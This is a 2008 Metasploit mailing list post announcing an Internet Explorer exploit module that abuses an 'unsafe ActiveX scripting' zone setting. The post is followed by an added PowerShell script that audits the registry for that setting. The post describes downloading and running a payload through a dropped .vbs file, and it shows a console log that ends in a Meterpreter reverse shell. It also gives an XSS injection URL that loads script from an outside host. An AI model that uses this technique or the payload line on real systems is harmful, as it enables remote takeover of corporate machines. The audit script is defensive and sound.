Metasploit mailing list archives
ie_unsafe_scripting.rb exploit module
From: natron at invisibledenizen.org (natron)
Date: Tue, 16 Dec 2008 10:35:39 -0600
All,

I've recently come across environments that have the "Initialize and script ActiveX controls not marked safe for scripting" setting configured to run without prompt for the 'Intranet' or 'Trusted Sites' zones. This grants access to WScript.Shell, so my first thought was to add a little code to ie_createobject, but I discovered that the unsafe scripting setting doesn't grant access to MSXML.XMLHTTP, so a warning dialog still popped. So, I used Scripting.FileSystemObject to dump commands to a .vbs file, which then calls MSXML2.XMLHTTP to download the payload. When complete, the javascript executes the downloaded file.

    msf exploit(ie_unsafe_scripting) > exploit
    [*] Exploit running as background job.
    [*] Handler binding to LHOST 127.0.0.1
    [*] Started reverse handler
    [*] Using URL: http://127.0.0.1:8080/ie_unsafe_scripting.js
    [*] Server started.
    [*] Sending exploit javascript to 127.0.0.1:1422...
    [*] Exe will be hOIJa.exe and must be manually removed from the %TEMP% directory on the target.
    [*] Sending EXE payload to 127.0.0.1:1424...
    [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
    [*] Sending stage (75776 bytes)
    [*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:1425)
    msf exploit(ie_unsafe_scripting) > sessions -i 1
    [*] Starting interaction with 1...
    getuid
    Server username: DOMAIN\USERNAME

Description from the file:

    'Name'        => 'Internet Explorer Unsafe Scripting Misconfiguration Vulnerability',
    'Description' => %q{
        This exploit takes advantage of the "Initialize and script ActiveX
        controls not marked safe for scripting" setting within Internet
        Explorer. When this option is set, IE allows access to the
        WScript.Shell ActiveX control, which allows javascript to interact
        with the file system and run commands. This security flaw is not
        uncommon in corporate environments for the 'Intranet' or
        'Trusted Site' zones.

        This option does not allow javascript to save binary data to the
        file system without a security alert, however, so this module
        downloads a binary executable through a .vbs script written to
        disk and executes.

        When set via domain policy, the most common registry entry to
        modify is HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201,
        which if set to '0' forces ActiveX controls not marked safe for
        scripting to be enabled for the Intranet zone.

        This module creates javascript code meant to be included in a
        <SCRIPT> tag, such as
        http://intranet-server/xss.asp?id="><script%20src=http://10.10.10.10/ie_unsafe_script.js> </script>.
    },

-------------- next part --------------
A non-text attachment was scrubbed...
Name: ie_unsafe_scripting.rb
Type: application/octet-stream
Size: 5317 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081216/0d612dbe/attachment.obj>
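The misconfiguration the post describes is the zone action value 1201 ("Initialize and script ActiveX controls not marked safe for scripting") being set to 0 in the Intranet zone. The following audit script is an added example, not part of the post or of the Metasploit module: it reads value 1201 for the Intranet (1) and Trusted Sites (2) zones from the policy key named in the post and from the equivalent non-policy and HKCU keys, and flags any zone where the control is enabled. The value meanings (0 = Enable, 1 = Prompt, 3 = Disable) are the standard IE zone action codes; the function name is my own.

```powershell
# Added audit example (not from the original post or the Metasploit module).
# Reports the "Initialize and script ActiveX controls not marked safe for
# scripting" action (value 1201) for the Intranet and Trusted Sites zones.
# IE zone action values: 0 = Enable (unsafe), 1 = Prompt, 3 = Disable.
function Test-IeUnsafeScriptingZones {
    $zones   = @{ 1 = 'Intranet'; 2 = 'Trusted Sites' }
    $meaning = @{ 0 = 'Enable (UNSAFE)'; 1 = 'Prompt'; 3 = 'Disable' }
    # Policy keys (first two) override the per-machine / per-user preference keys.
    $roots = @(
        'HKLM:\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones',
        'HKCU:\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
    )

    foreach ($root in $roots) {
        foreach ($id in $zones.Keys) {
            $key = Join-Path $root $id
            if (-not (Test-Path $key)) { continue }
            $item = Get-ItemProperty -Path $key -Name '1201' -ErrorAction SilentlyContinue
            if ($null -eq $item) { continue }   # value absent here; another key decides
            $val = [int]$item.'1201'
            $label = if ($meaning.ContainsKey($val)) { $meaning[$val] } else { "Unknown ($val)" }
            [pscustomobject]@{
                Zone     = $zones[$id]
                Key      = $key
                Value    = $val
                Meaning  = $label
                Unsafe   = ($val -eq 0)   # the setting the ie_unsafe_scripting module relies on
            }
        }
    }
}

# Print the findings, with unsafe zones listed first.
Test-IeUnsafeScriptingZones | Sort-Object -Property Unsafe -Descending | Format-Table -AutoSize
```

A row with Unsafe = True in a policy key is the domain-policy setting the post refers to; fixing it means setting 1201 to 3 (Disable) or at least 1 (Prompt) for that zone in the policy.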